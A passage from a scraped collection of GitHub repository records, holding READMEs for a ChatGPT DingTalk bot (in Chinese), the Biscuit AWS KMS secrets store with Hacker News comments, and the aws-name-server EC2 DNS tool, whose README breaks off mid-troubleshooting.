\u827e\u7279\u673a\u5668\u4eba\u53d1\u9001\u7a7a\u5185\u5bb9\u6216\u8005\u5e2e\u52a9\uff0c\u4f1a\u8fd4\u56de\u5e2e\u52a9\u5217\u8868\u3002\n\n![image_20230216_221253](https://cdn.staticaly.com/gh/eryajf/tu/main/img/image_20230216_221253.png)\n\n`\u5207\u6362\u6a21\u5f0f`\n\n> \u53d1\u9001\u6307\u5b9a\u5173\u952e\u5b57\uff0c\u53ef\u4ee5\u5207\u6362\u4e0d\u540c\u7684\u6a21\u5f0f\u3002\n\n![image_20230215_184655](https://cdn.staticaly.com/gh/eryajf/tu/main/img/image_20230215_184655.png)\n\n> \ud83d\udce2 \u6ce8\u610f\uff1a\u4e32\u804a\u6a21\u5f0f\u4e0b\uff0c\u7fa4\u91cc\u6bcf\u4e2a\u4eba\u7684\u804a\u5929\u4e0a\u4e0b\u6587\u662f\u72ec\u7acb\u7684\u3002\n> \ud83d\udce2 \u6ce8\u610f\uff1a\u9ed8\u8ba4\u5bf9\u8bdd\u6a21\u5f0f\u4e3a\u5355\u804a\uff0c\u56e0\u6b64\u4e0d\u5fc5\u53d1\u9001\u5355\u804a\u5373\u53ef\u8fdb\u5165\u5355\u804a\u6a21\u5f0f\uff0c\u800c\u8981\u8fdb\u5165\u4e32\u804a\uff0c\u5219\u9700\u8981\u53d1\u9001\u4e32\u804a\u5173\u952e\u5b57\u8fdb\u884c\u5207\u6362\uff0c\u5f53\u4e32\u804a\u5185\u5bb9\u8d85\u8fc7\u6700\u5927\u9650\u5236\u7684\u65f6\u5019\uff0c\u4f60\u53ef\u4ee5\u53d1\u9001\u91cd\u7f6e\uff0c\u7136\u540e\u518d\u6b21\u8fdb\u5165\u4e32\u804a\u6a21\u5f0f\u3002\n\n`\u5b9e\u9645\u804a\u5929\u6548\u679c\u5982\u4e0b`\n\n![image_20221209_163739](https://cdn.staticaly.com/gh/eryajf/tu/main/img/image_20221209_163739.png)\n\n---\n\n\u5982\u679c\u4f60\u60f3\u901a\u8fc7\u547d\u4ee4\u884c\u76f4\u63a5\u90e8\u7f72\uff0c\u53ef\u4ee5\u76f4\u63a5\u4e0b\u8f7drelease\u4e2d\u7684[\u538b\u7f29\u5305](https://github.com/eryajf/chatgpt-dingtalk/releases) \uff0c\u8bf7\u6839\u636e\u81ea\u5df1\u7cfb\u7edf\u4ee5\u53ca\u67b6\u6784\u9009\u62e9\u5408\u9002\u7684\u538b\u7f29\u5305\uff0c\u4e0b\u8f7d\u4e4b\u540e\u76f4\u63a5\u89e3\u538b\u8fd0\u884c\u3002\n\n\u4e0b\u8f7d\u4e4b\u540e\uff0c\u5728\u672c\u5730\u89e3\u538b\uff0c\u5373\u53ef\u770b\u5230\u53ef\u6267\u884c\u7a0b\u5e8f\uff0c\u4e0e\u914d\u7f6e\u6587\u4ef6\uff1a\n\n```\n$ tar xf chatgpt-dingtalk-v0.0.4-darwin-arm64.tar.gz\n$ cd chatgpt-dingtalk-v0.0.4-darwin-arm64\n$ cp config.dev.json # \u6839\u636e\u60c5\u51b5\u8c03\u6574\u914d\u7f6e\u6587\u4ef6\u5185\u5bb9\n$ ./chatgpt-dingtalk # \u76f4\u63a5\u8fd0\u884c\n\n# \u5982\u679c\u8981\u5b88\u62a4\u5728\u540e\u53f0\u8fd0\u884c\n$ nohup ./chatgpt-dingtalk &> run.log &\n$ tail -f run.log\n```\n\n\n## \u672c\u5730\u5f00\u53d1\n\n```sh\n# \u83b7\u53d6\u9879\u76ee\n$ git clone https://github.com/eryajf/chatgpt-dingtalk.git\n\n# \u8fdb\u5165\u9879\u76ee\u76ee\u5f55\n$ cd chatgpt-dingtalk\n\n# \u590d\u5236\u914d\u7f6e\u6587\u4ef6\uff0c\u6839\u636e\u4e2a\u4eba\u5b9e\u9645\u60c5\u51b5\u8fdb\u884c\u914d\u7f6e\n$ cp 
config.dev.json config.json\n\n# \u542f\u52a8\u9879\u76ee\n$ go run main.go\n```\n\n## \u914d\u7f6e\u6587\u4ef6\u8bf4\u660e\n\n```json\n{\n \"api_key\": \"xxxxxxxxx\", // openai api_key\n \"session_timeout\": 600 // \u4f1a\u8bdd\u8d85\u65f6\u65f6\u95f4,\u9ed8\u8ba4600\u79d2,\u5728\u4f1a\u8bdd\u65f6\u95f4\u5185\u6240\u6709\u53d1\u9001\u7ed9\u673a\u5668\u4eba\u7684\u4fe1\u606f\u4f1a\u4f5c\u4e3a\u4e0a\u4e0b\u6587\n}\n```\n\n## \u5e38\u89c1\u95ee\u9898\n\n\u4e00\u4e9b\u5e38\u89c1\u7684\u95ee\u9898\uff0c\u6211\u5355\u72ec\u5f00issue\u653e\u5728\u8fd9\u91cc\uff1a[\u70b9\u6211](https://github.com/eryajf/chatgpt-dingtalk/issues/44)\uff0c\u53ef\u4ee5\u67e5\u770b\u8fd9\u91cc\u8f85\u52a9\u4f60\u89e3\u51b3\u95ee\u9898\uff0c\u5982\u679c\u91cc\u8fb9\u6ca1\u6709\uff0c\u8bf7\u5bf9\u5386\u53f2issue\u8fdb\u884c\u641c\u7d22(\u4e0d\u8981\u63d0\u4ea4\u91cd\u590d\u7684issue)\uff0c\u4e5f\u6b22\u8fce\u5927\u5bb6\u8865\u5145\u3002\n\n## \u9ad8\u5149\u65f6\u523b\n\n> \u672c\u9879\u76ee\u66fe\u5728[2022-12-12](https://github.com/bonfy/github-trending/blob/master/2022/2022-12-12.md#go),[2022-12-18](https://github.com/bonfy/github-trending/blob/master/2022/2022-12-18.md#go),[2022-12-19](https://github.com/bonfy/github-trending/blob/master/2022/2022-12-19.md#go),[2022-12-20](https://github.com/bonfy/github-trending/blob/master/2022/2022-12-20.md#go),[2023-02-09](https://github.com/bonfy/github-trending/blob/master/2023-02-09.md#go),[2023-02-10](https://github.com/bonfy/github-trending/blob/master/2023-02-10.md#go),[2023-02-11](https://github.com/bonfy/github-trending/blob/master/2023-02-11.md#go),[2023-02-12](https://github.com/bonfy/github-trending/blob/master/2023-02-12.md#go)\uff0c\u8fd9\u4e9b\u5929\u91cc\uff0c\u767b\u4e0aGitHub Trending\u3002\u800c\u4e14\u8fd8\u5728\u6301\u7eed\u767b\u699c\u4e2d\uff0c\u53ef\u89c1\u6700\u8fd1openai\u7684\u70ed\u5ea6\u3002\n> ![image_20230215_094034](https://cdn.staticaly.com/gh/eryajf/tu/main/img/image_20230215_094034.png)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dcoker/biscuit", "link": "https://github.com/dcoker/biscuit", "tags": [], "stars": 556, "description": "Biscuit is a multi-region HA key-value store for your AWS infrastructure secrets.", "lang": "Go", "repo_lang": "", "readme": "> :warning: **Biscuit is no longer maintained.** Do not use Biscuit on new projects.\n\n# Biscuit\n\n[![Build Status](https://travis-ci.org/dcoker/biscuit.svg)](https://travis-ci.org/dcoker/biscuit)\n\nBiscuit is a simple key-value store for your infrastructure secrets.\n\n\n## Is Biscuit right for me?\n\nBiscuit is most useful to teams already using AWS and IAM to manage their \ninfrastructure. 
If that describes your team, then Biscuit might be useful to \nyou if you answer \"yes\" to any of these questions:\n\n* Do you live in constant fear of accidentally committing infrastructure secrets to source control?\n* Do you commit private keys to your source repository?\n* Do you share passwords with other developers?\n* Do you want to manage secrets securely across multiple regions?\n\n### Features\n\n* Provides a simple key/value CLI to secure storage.\n* Secrets can live alongside with your code in source control.\n* Operates with KMS keys across multiple regions.\n* Facilitates management of AWS IAM Policies, KMS Policies, and KMS Grants across multiple regions.\n* Local encryption using AES-GCM-256 or Secretbox (NaCL).\n* Offline mode: Using the \"testing\" key manager, you can use Biscuit in\n test environments without changing your code and without network \n dependencies.\n\n### Feature Comparison\n\n| Package | Requires a server? | Multi-region | HA | Rotation | Storage | AWS KMS | Principals | Web UI |\n|:----------------------------------------------------|:-------------------|:-------------|:----|:---------|:---------|:---------|:-----------|:-------|\n| Biscuit | No | Yes | Yes | No | File | Required | AWS Only | No |\n| [Credstash](https://github.com/fugue/credstash) | No | No | Yes | No | DynamoDB | Required | AWS Only | No |\n| [Lyft Confidant](https://github.com/lyft/confidant) | Yes | No | No | No | DynamoDB | Required | AWS Only | Yes |\n| [Hashicorp Vault](https://www.vaultproject.io) | Yes | Yes | Yes | Yes | Varied | Optional | Multiple | No |\n\n## Quick Start\n\n### Installing\n\n#### Downloading\n\nSee [releases](https://github.com/dcoker/biscuit/releases) for the latest release.\n\n#### Building from Source\n\nIf you have Golang 1.16+ installed, you can install with:\n\n```\ngo get -v github.com/dcoker/biscuit\n```\n\n### Setup\n\n```shell\n# Verify that your AWS credentials are readable.\nbiscuit kms get-caller-identity\n\n# Provision a KMS Key w/useful defaults in us-east-1, us-west-1, \n# and us-west-2 and create a secrets.yml file.\nbiscuit kms init -f secrets.yml\n\n# Store the launch codes.\nbiscuit put -f secrets.yml -- launch_codes 0000\n\n# Decrypt the launch codes.\nbiscuit get -f secrets.yml launch_codes\n```\n\nNext steps: examine `secrets.yml` in your favorite text editor, and run \n`biscuit --help` to learn about additional commands.\n\n### Uninstalling\n\nDone already?\n\nThe `biscuit kms init` step above may have created a KMS Key and some\nassociated policies using CloudFormation. You can remove those by\nrunning:\n\n```shell\nbiscuit kms deprovision\nrm secrets.yml\n```\n\nNote: any biscuit files you created before deprovisioning will no longer\nbe readable.\n\n### Glossary\n\nThe **secret** is the plaintext value which you wish to protect.\n\nA **label** is a short alphanumeric string that identifies a set of keys\nacross multiple AWS regions. It is present in CloudFormation stack names\n(`biscuit-label`) and in KMS key aliases (`alias/biscuit-label`).\n\nThe **key manager** is responsible for the provisioning of encryption\nkeys. The encryption keys generated by the key manager are used to\nencrypt the **secret**. An encrypted version of the encryption key -- \ndecryptable only by KMS -- is stored as the **key ciphertext**.\n\nSecret **values** consist of the information necessary for the **key\nmanager** to provide the plaintext encryption key to decrypt a\n**ciphertext** for a named secret. 
Values consist of a Key ID (a\nstring, meaningful to the key manager), an indicator of which key manager is\nin use (string), an algorithm (string), the key ciphertext (the\nencrypted key, base64), and the ciphertext (base 64). Here is an example\nof a value named `api_key`:\n\n```yaml\napi_key:\n- key_id: arn:aws:kms:us-west-1:123456789012:key/37793df5-ad32-4d06-b19f-bfb95cee4a35\n key_manager: kms\n algorithm: secretbox\n key_ciphertext: CiA3edlKfUWXVgiDDuzbz95S/pkM8grwRsYkjRoURv0LGhKnAQEBAQB4N3nZSn1Fl1YIgw7s28/eUv6ZDPIK8EbGJI0aFEb9CxoAAAB+MHwGCSqGSIb3DQEHBqBvMG0CAQAwaAYJKoZIhvcNAQcBMB4GCWCGSAFlAwQBLjARBAw4OEtFZrisfC3xJHACARCAO+HJpH4bWD/MF9BYjBvl5ztcezTNxo5SPeAOKJ3Z8Pff2vh1uCZhEEjxnF7t1tqTma8oeESuu2vpPiZp\n ciphertext: YsI/4Qnzpu+Vm+JP4LhnO8Y3dSoz61/vKHBXGVI1pVAUCjMhvjb9ohcdjA==\n```\n\n**Names** identify a value. When using AWS KMS, names are\nencoded into the **encryption context** and must be provided by the\nprocess that decrypts the value.\n\nA key **template** is a special entry in the .yml file which tells the\nbiscuit tool how to handle values that are added to that file. This is\nan example template:\n\n```yaml\n_keys:\n- key_id: arn:aws:kms:us-west-1:123456789012:key/37793df5-ad32-4d06-b19f-bfb95cee4a35\n key_manager: kms\n algorithm: secretbox\n- key_id: arn:aws:kms:us-west-2:123456789012:key/c0045b15-9880-4b17-84da-a35760e8a16f\n key_manager: kms\n algorithm: secretbox\n- key_id: arn:aws:kms:us-east-1:123456789012:key/d1c5a8e3-adfb-4f79-af0b-cde9f1a31292\n key_manager: kms\n algorithm: secretbox\n```\n\n## IAQ\n\n### How much does this cost?\n\nBiscuit requires one key in each region you wish to use. Most users can\nexpect to pay ~$1/mo per region per label, and additional usage charges\nfor heavy users. See\n[AWS Key Management Service Pricing](https://aws.amazon.com/kms/pricing/)\nfor pricing.\n\n### Can I use it in a single AWS region?\n\nYes. Use the `-r` flag or the `BISCUIT_REGIONS` environment variable to specify\nthe region.\n\nExample:\n\n```shell\nbiscuit kms init -r us-west-2 -f secrets.yml\n```\n\n### What do I do with the .yml file after it is created?\n\nThe .yml file is safe for committing to version control, your CI system,\nembedding in native binaries, copying to S3, publishing in a newspaper,\netc. You can deploy these to your production servers by whatever\nmechanism is most appropriate for your environment, but by far the\neasiest way to start is to simply include it in your deployments in the\nsame way you would a configuration file.\n\n### Once I've created a value, how do I let AWS resources decrypt it?\n\nYou can use KMS Grants, KMS Key Policies, or IAM Policies to manage access \nto the secrets.\n\n#### KMS Grants\n\nKMS Grants enable you to delegate access to specific KMS operations to some\nAWS principal. 
Often your AWS resources will be running with an IAM Role, and \nthus often the easiest thing to do is to use KMS Grants to allow your IAM Roles\nto decrypt the appropriate values.\n\nBiscuit will create and retire those grants for you.\n\nHere's how to grant role/webserver and user/gordon the ability to decrypt the launch codes:\n\n```shell\nbiscuit kms grants create --grantee-principal role/webserver -f secrets.yml launch_codes\nbiscuit kms grants create --grantee-principal user/gordon -f secrets.yml launch_codes\nbiscuit kms grants list -f secrets.yml launch_codes\n```\n\nIf you wish to allow a principal to decrypt all values encrypted under the same set of keys as\nthe launch codes, you can pass the `--all-names` flag:\n\n```shell\nbiscuit kms grants create -g role/webserver -f secrets.yml --all-names launch_codes\n```\n\nYou can also retire grants when they are no longer useful:\n\n```shell\nbiscuit kms grants list -f secrets.yml launch_codes\nbiscuit kms grants retire -f secrets.yml --grant-name biscuit-ff8102edc8 launch_codes\n```\n\nBiscuit manages grants using the KMS [CreateGrant](http://docs.aws.amazon.com/kms/latest/APIReference/API_CreateGrant.html),\n[ListGrants](http://docs.aws.amazon.com/kms/latest/APIReference/API_ListGrants.html), and \n[RetireGrant](http://docs.aws.amazon.com/kms/latest/APIReference/API_RetireGrant.html) APIs.\n\n#### KMS Key Policies\n\nKMS Keys have their own policies. See \n[Key Policies](http://docs.aws.amazon.com/kms/latest/developerguide/key-policies.html) \nfor more details. If you have just a few users, this is possibly the easiest\nmechanism to use to control access. You can run `biscuit kms edit-key-policy` to \nedit the policy document across all of your regions at once.\n\nBiscuit manages Key Policies using the KMS [GetKeyPolicy](http://docs.aws.amazon.com/kms/latest/APIReference/API_GetKeyPolicy.html) \nand [SetKeyPolicy](http://docs.aws.amazon.com/kms/latest/APIReference/API_SetKeyPolicy.html) APIs.\n\n#### IAM Policies\n\nIAM Policies are attached to a myriad of AWS entities, and they can also be \nused to enable access to KMS operations. See \n[Key Policies](http://docs.aws.amazon.com/kms/latest/developerguide/key-policies.html) for more details.\n\nExample: You have a server running with a static AWS access key and secret key. You can give that\nserver the ability to decrypt all values encrypted under a set of keys by attaching a standard user policy, \nspecifying `kms:Decrypt` as the Action and the full key ARNs in the Resource field.\n\nNote: IAM Policies are global entities, whereas KMS Keys are unique per region. Thus if you have a 3-region \nconfiguration, any IAM Policies that explicitly grant access to KMS Keys will need to list all 3 \nregion-specific key ARNs.\n\nBiscuit does not manage IAM Policies for you. \n\nIf you wish to disallow IAM Policies from controlling access to your keys,\nyou can do so by passing `--disable-iam-policies` to `kms init`. When IAM\nPolicies are disabled, the only way to control access to keys is via Grants and KMS Key \nPolicies. For more information on how this works, see the CloudFormation \ntemplate in the source repository and the Key Policies doc linked above.\n\n### How do I control which AWS region is used to decrypt the values?\n\nEach AWS region has its own isolated KMS instance. 
This means that KMS keys\nare per-region resources, and using a KMS key requires communicating with the KMS\nservice in the region that holds that key.\n\nWhen encrypting, Biscuit will attempt to encrypt the secrets by using all of\nthe KMS instances corresponding to the regions of the keys it is told to use.\nThis can incur cross-datacenter traffic and is slower than using only the\nclosest region.\n\nWhen decrypting, Biscuit only needs to decrypt under one of the keys. By\ndefault, Biscuit will prioritize using keys that are in the same region that\nthe caller is in. This is determined by the `AWS_REGION` environment variable.\nIf you do not have an `AWS_REGION` variable set, Biscuit will process keys in\nthe order that they appear in the .yml file.\n\nYou can override this behavior by passing a `--aws-region-priority` flag to the\n`get` or `export` operations. Here is an example invocation which prioritizes\nkeys in ap-north-1 and us-west-2:\n\n```shell\nbiscuit get --aws-region-priority ap-north-1,us-west-2 -f secrets.yml launch_codes\n```\n\nWe recommend you make arrangements on your EC2 instances to either set the\n`AWS_REGION` environment variable, or pass a latency-ordered list of regions via the\n`--aws-region-priority` flag.\n\n\n### How do I keep my development and production keys separate?\n \nBiscuit tracks keys across regions by using a label. Labels are embedded \ninto the name of the CloudFormation stack and a KMS Key Alias in each region. \nThe default behavior is to use the `default` label, but you can change this \nby passing the `-l` flag. Example: `biscuit kms init -l development`\n \nLabels are not persisted with the values and are not visible in the .yml \nfiles. They are an organizational tool to facilitate managing keys across \nregions, and are passed as parameters to various commands.\n\nHere are some common scenarios:\n\n```shell\n# Create a key in a single region, and allow developers to do whatever they want. \nbiscuit kms init -r us-west-2 -l development -f development.yml --administrators role/developers --users role/developers\nbiscuit put -f development.yml ssl_key -i selfsigned.key\n\n# Create keys in three regions, allow a limited set of people to administer them,\n# and allow developers (and gordon) to read and write the secrets.\nbiscuit kms init -l production -f production.yml --administrators role/prod-keymaster --users role/developers,user/gordon\nbiscuit put -f production.yml ssl_key -i wildcard.key\n\n# Create a file that doesn't use encryption at all.\nbiscuit put -f unittest.yml -a none -- database_password testing\n```\n\n### What's the difference between an \"administrator\" and a \"user\"?\n\nBiscuit installs a KMS Key Policy similar to the default policy \nrecommended by AWS. This creates a distinction between \n[\"administrators\"](http://docs.aws.amazon.com/kms/latest/developerguide/key-policies.html#key-policy-default-allow-administrators) \nand [\"users\"](http://docs.aws.amazon.com/kms/latest/developerguide/key-policies.html#key-policy-default-allow-users).\n\nAdministrators can administer the key but not necessarily encrypt or decrypt \nwith that key. They could, if they wished, replace the key policy with one \nthat does allow them to encrypt and decrypt, but that would be unusual.\n\nUsers can encrypt, decrypt, and generate ephemeral data keys. In most \ncases, you'll want to make your development team a \"user\" and \npossibly also \"administrators\". 
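\n\nTo check how an existing key's policy currently splits the two roles, one option (a sketch only, not a Biscuit subcommand; the key ARN and region below are the example values from the glossary above) is to pull the key policy with the AWS CLI and read its administrator and user statements:\n\n```shell\n# Print the key policy document for one of the label's keys.\n# The statement granting kms:Encrypt/kms:Decrypt/kms:GenerateDataKey* names the \"users\";\n# the statement granting the key-management actions names the \"administrators\".\naws kms get-key-policy --key-id arn:aws:kms:us-west-1:123456789012:key/37793df5-ad32-4d06-b19f-bfb95cee4a35 --policy-name default --region us-west-1 --output text\n```\n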
\n\nIf you use `biscuit kms init` to create your keys, you can use the \n`--administrators` and `--users` flag to set membership. If you have already\ncreated the keys but want to change the policy, use the interactive\n`biscuit kms edit-key-policy` to apply changes to all regions simultaneously.\n\n### What is the minimum IAM Policy needed to run `kms init`?\n\nThe IAM Policy below is the smallest set of permissions needed to get\nstarted with Biscuit using `kms init`. Be sure to replace the account \nnumber `123456789012` with your own.\n\n```json\n{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Sid\": \"AllowKmsListAliasesAndCreateKey\",\n \"Effect\": \"Allow\",\n \"Action\": [\n \"kms:ListAliases\",\n \"kms:CreateKey\"\n ],\n \"Resource\": [\n \"*\"\n ]\n },\n {\n \"Sid\": \"AllowKmsCreateAlias\",\n \"Effect\": \"Allow\",\n \"Action\": [\n \"kms:CreateAlias\"\n ],\n \"Resource\": [\n \"arn:aws:kms:*:123456789012:alias/biscuit-*\"\n ]\n },\n {\n \"Sid\": \"AllowKmsDeleteAlias\",\n \"Effect\": \"Allow\",\n \"Action\": [\n \"kms:DeleteAlias\"\n ],\n \"Resource\": [\n \"arn:aws:kms:*:123456789012:alias/biscuit-*\"\n ]\n },\n {\n \"Sid\": \"AllowCloudFormationCreate\",\n \"Effect\": \"Allow\",\n \"Action\": [\n \"cloudformation:DescribeStacks\",\n \"cloudformation:CreateStack\",\n \"cloudformation:DeleteStack\"\n ],\n \"Resource\": [\n \"arn:aws:cloudformation:*:123456789012:stack/biscuit-*\"\n ]\n },\n {\n \"Sid\": \"AllowCloudFormationDelete\",\n \"Effect\": \"Allow\",\n \"Action\": [\n \"cloudformation:DeleteStack\"\n ],\n \"Resource\": [\n \"arn:aws:cloudformation:*:123456789012:stack/biscuit-*\"\n ]\n }\n ]\n}\n```\n\n### Does Biscuit support multi-factor authentication?\n\nYes. IAM Policies and the KMS Key Policies support the `aws:MultiFactorAuthPresent` condition.\n\nBiscuit does not enforce any access control on its own. All enforcement is\nimplemented by AWS. Any features that are available in the IAM Policies, KMS Key \nPolicy documents, or KMS Grants are available to you. \n\nBiscuit does not expose command line flags to use all of the features, but you \ncan edit the various policies after they are created, or override the default \nCloudFormation template.\n\nBiscuit is known to work well with [awsmfa](https://pypi.python.org/pypi/awsmfa).\n\n### I manually edited the .yaml file and changed the name of a value and now it won't decrypt. What's wrong?\n\nThe `kms` key manager annotates the ciphertext with an\n[EncryptionContext](http://docs.aws.amazon.com/kms/latest/developerguide/encryption-context.html)\ncontaining the name of the value. If you change the name of a value,\nthen the decrypting process will provide the wrong name to the decrypt\noperation and the decrypt will fail. If you wish to change the name of a\nsecret, re-encrypt it using the new name instead.\n\n### I want to change something about the CloudFormation template. What do I do?\n\nThe `biscuit kms init` command allows you to override the built-in\nCloudFormation template with your own via the\n`--cloudformation-template-url` parameter. \n\n### My account administrator does not let me create CloudFormation stacks, help!\n\nThe only expectations that Biscuit has about your KMS configuration is that the \nkeys have aliases of the form `alias/biscuit-{label}` and that you have sufficient \npermissions to operate on the KMS keys. 
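\n\nFor example (a sketch only; the key ID shown is a placeholder, and your organization may require different key settings), creating a compatible key and alias by hand with the AWS CLI in one region looks roughly like this:\n\n```shell\n# Create a key, then point the alias Biscuit expects (alias/biscuit-{label}) at it.\naws kms create-key --description \"biscuit default label key\" --region us-west-2\naws kms create-alias --alias-name alias/biscuit-default --target-key-id 11111111-2222-3333-4444-555555555555 --region us-west-2\n```\n\nRepeat this in each region you plan to use.\n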
You can create the keys using whatever\nprocess is compatible with your organization's policies.\n\n### How do I rotate the values?\n\nBiscuit considers the rotation of secrets (such as database passwords)\nto be application-specific features and thus does not have any native\nsupport for it. However, you can\nimplement a rotation scheme appropriate for your situation simply by\nserializing that state as the secret and then read it with your \napplication-specific rotation behaviors. \n\nHere is an example using JSON and [jq](https://stedolan.github.io/jq/):\n\n```shell\nbiscuit put -f secrets.yml -- database_passwords '{\"1\": \"pass1\", \"2\": \"pass2\"}'\nbiscuit get -f secrets.yml database_passwords | jq -r '.[to_entries | map(.key) | map(tonumber) | max | tostring]'\n```\n\n", "readme_type": "markdown", "hn_comments": "This is also similiar to Sneaker (https://github.com/codahale/sneaker), which is written in Go. It doesn't copy to other regions by default, but it's not hard to handle that on your own. This also uses KMS, but stores encrypted secrets in S3.The project is nice, but I'm gonna have to stick with Vault as I like the flexibility of storage backends and not locked into AWS for enterprise-y apps that can't go to AWS.It looks like this is fairly similar to Mozilla sops[1].[1]https://github.com/mozilla/sopsSomewhat off-topic, but I read dcoker's username as docker at first and was fairly confused as to why docker was producing something like this just for AWS.Why no key rotation? I'd be very careful with something that doesn't rotate keys.I feel like this problem is already solved with iam ec2 instance roleshttp://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles...At work we use chef to deploy our credentials via KML flat files on the servers that require them. Works rather well.I prefer credstash (https://github.com/fugue/credstash) which uses KMS and stores encrypted values in dynamodb. It has built in ansible support via lookups too!", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ConradIrwin/aws-name-server", "link": "https://github.com/ConradIrwin/aws-name-server", "tags": [], "stars": 556, "description": "DNS server that lets you look up ec2 instances by instance name", "lang": "Go", "repo_lang": "", "readme": "A DNS server that serves up your ec2 instances by name.\n\nUsage\n=====\n\n```\naws-name-server --domain aws.bugsnag.com \\\n --aws-region us-east-1 \\\n --aws-access-key-id \\\n --aws-secret-access-key \n```\n\nThis will serve up DNS records for the following:\n\n* `.aws.bugsnag.com` all your EC2 instances tagged with Name=<name>\n* `..aws.bugsnag.com` the nth instances tagged with Name=<name>\n* `.role.aws.bugsnag.com` all your EC2 instances tagged with Role=<role>\n* `..role.aws.bugsnag.com` the nth instances tagged with Role=<role>\n* `.aws.bugsnag.com` all your EC2 instances by instance id.\n* `..aws.bugsnag.com` all your EC2 instances by instance id.\n\nIt uses CNAMEs so that instances will resolve to internal IP addresses if you query from inside AWS,\nand external IP addresses if you query from the outside.\n\nQuick start\n===========\n\nThere's a long-winded [Setup guide](#setup), but if you already know your way\naround EC2, you'll need to:\n\n1. Open up port 53 (UDP and TCP) on your security group.\n2. Boot an instance with an IAM Role with `ec2:DescribeInstances` permission. (or use an IAM user and\n configure `aws-name-server` manually).\n3. Install `aws-name-server`.\n4. 
Setup your NS records correctly.\n\nParameters\n==========\n\n### `--domain`\n\nThis is the domain you wish to serve. i.e. `aws.example.com`. It is the\nonly required parameter.\n\n### `--hostname`\n\nThe publically resolvable hostname of the current machine. This defaults\nsensibly, so you only need to set this if you see a warning in the logs.\n\n### `--aws-access-key-id` and `--aws-secret-access-key`\n\nAn Amazon key pair with permission to run `ec2:DescribeInstances`. This defaults to\nthe IAM role of the machine running `aws-name-server` or to the values of the environment\nvariables `$AWS_ACCESS_KEY_ID` and `$AWS_SECRET_ACCESS_KEY` (or `$AWS_ACCESS_KEY` and `$AWS_SECRET_KEY`).\n\n### `--aws-region`\n\nThis defaults to the region in which `aws-name-server` is running, or `us-east-1`.\n\nSetup\n=====\n\nThese instructions assume you're going to launch a new EC2 instance to run\n`aws-name-server`. If you want to run it on an existing server, adapt the\ninstructions to suit.\n\n### 1. Create an IAM role\n\n[IAM Roles](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html)\nlet you give EC2 instances permission to access the AWS API. We will need our\ndns machine to run `ec2:DescribeInstances`.\n\n1. Log into the AWS web console and navigate to IAM.\n2. Create a new role called *iam-role-aws-name-server*\n3. Select the *Amazon EC2* role type.\n4. Create a *Custom Policy* called *describe-instances-only* with the content:\n\n ```\n {\n \"Version\": \"2012-10-17\",\n \"Statement\": [{\n \"Action\": [\"ec2:DescribeInstances\"],\n \"Effect\": \"Allow\",\n \"Resource\": \"*\"\n }]\n }\n ```\n\n### 2. Create a security group\n\n[Security groups](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html)\ndescribe what traffic is allowed to get to your instance. DNS servers use UDP port 53 and TCP port 53.\n\n1. Log into the AWS web console and navigate to EC2.\n2. Create a new security group called *aws-name-server*\n3. Configure it to have:\n\n ```\n # Type # Protocol # Port # Source\n SSH TCP 22 My IP x.x.x.x/32\n DNS UDP 53 Anywhere 0.0.0.0/0\n Custom TCP 53 Anywhere 0.0.0.0/0\n ```\n\nThis will let you ssh in to the DNS server, and let anyone run DNS queries.\n\n### 3. Launch an instance\n\nI recommend running 64bit HVM-based EBS-backed Ubuntu 14.04 on a `t2.micro`\n([ami-acff23c4](https://console.aws.amazon.com/ec2/home?region=us-east-1#launchAmi=ami-acff23c4)). You\ncan use whatever distro you like the most.\n\n1. Log into the AWS web console and navigate to EC2.\n2. Click \"Launch Instance\"\n3. Select your favourite AMI (e.g. *ami-acff23c4*).\n3. Select your favourite cheap instance type (e.g. *t2.micro*) (If you don't have VPCs yet, choose *t1.micro* instead)\n4. Set IAM role to *iam-role-aws-name-server*\n5. Skip through disks (the default is fine)\n6. Skip through tags (though if you set Name=dns1 and Role=dns you can test the server :)\n7. Select an existing security group `sg-aws-name-server`.\n8. Launch!\n\n### 4. Install the binary\n\n1. Download the [latest version](http://gobuild.io/download/github.com/ConradIrwin/aws-name-server/master).\n\n ```\n wget http://gobuild.io/github.com/ConradIrwin/aws-name-server/master/linux/amd64 -O aws-name-server.zip\n unzip aws-name-server.zip\n ```\n\n2. Move the binary into /usr/bin.\n\n ```\n sudo cp aws-name-server /usr/bin\n sudo chmod +x /usr/bin/aws-name-server\n ```\n\n3. 
(optional) Set the capabilities of aws-name-server so it doesn't need to run as root.\n\n ```\n # the cap_net_bind_service capability allows this program to bind to ports below 1024\n # when it us run as a non-root user.\n sudo setcap cap_net_bind_service=+ep /usr/bin/aws-name-server\n ```\n\n### 5. Configure upstart.\n\nIf you use upstart (the default process manager under ubuntu) you can use the provided upstart\nscript. You'll need to change the script to reflect your hostname:\n\n1. Open upstart/aws-name-server.conf and change --domain=internal to --domain <your-domain>\n2. `sudo cp upstart/aws-name-server.conf /etc/init/`\n3. `sudo initctl start aws-name-server`\n\n### 6. Configure NS Records\n\nTo add your DNS server into the global DNS tree, you need to add an `NS` record\nfrom the parent domain to your new server.\n\nLet's say you currently have DNS for `example.com`, and you're running\n`aws-name-server` on the machine `ec2-12-34-56-78.compute-1.amazonaws.com`. In\nthe admin page for `example.com`s DNS add a new record of the form:\n\n```\n# name # ttl # value\naws.example.com 300 IN NS ec2-12-34-56-78.compute-1.amazonaws.com\n```\n\nThe TTL can be whatever you want, I like 5 minutes because it's not too long to wait if I make a mistake.\n\nThe value should be a hostname for your server that is directly resolvable (i.e. not a CNAME). The public\nhostnames that Amazon gives instances are perfect for this.\n\nTroubleshooting\n===============\n\nThere's a lot that can go wrong, so troubleshooting takes a while.\n\n### Did it start?\n\nFirst try looking in the logs (`/var/log/upstart/aws-name-server.log` if you're\nusing upstart). If there's nothing there, then try `/var/log/syslog`.\n\n### Is it running?\nTry running `dig dns1.aws.example.com @localhost` while ssh'd into the machine.\nIt should return a `CNAME` record. If not, look in the logs, the chances are\nthe DNS server is not running. This happens if your EC2 credentials are wrong.\n\n### Is the security group configured correctly?\nAssuming you can make DNS lookups to localhost, try running\n`dig dns1.aws.example.com @ec2-12-34-56-78.compute-1.amazonaws.com` from your\nlaptop. If you don't get a reply, double check the security group config.\n\n### 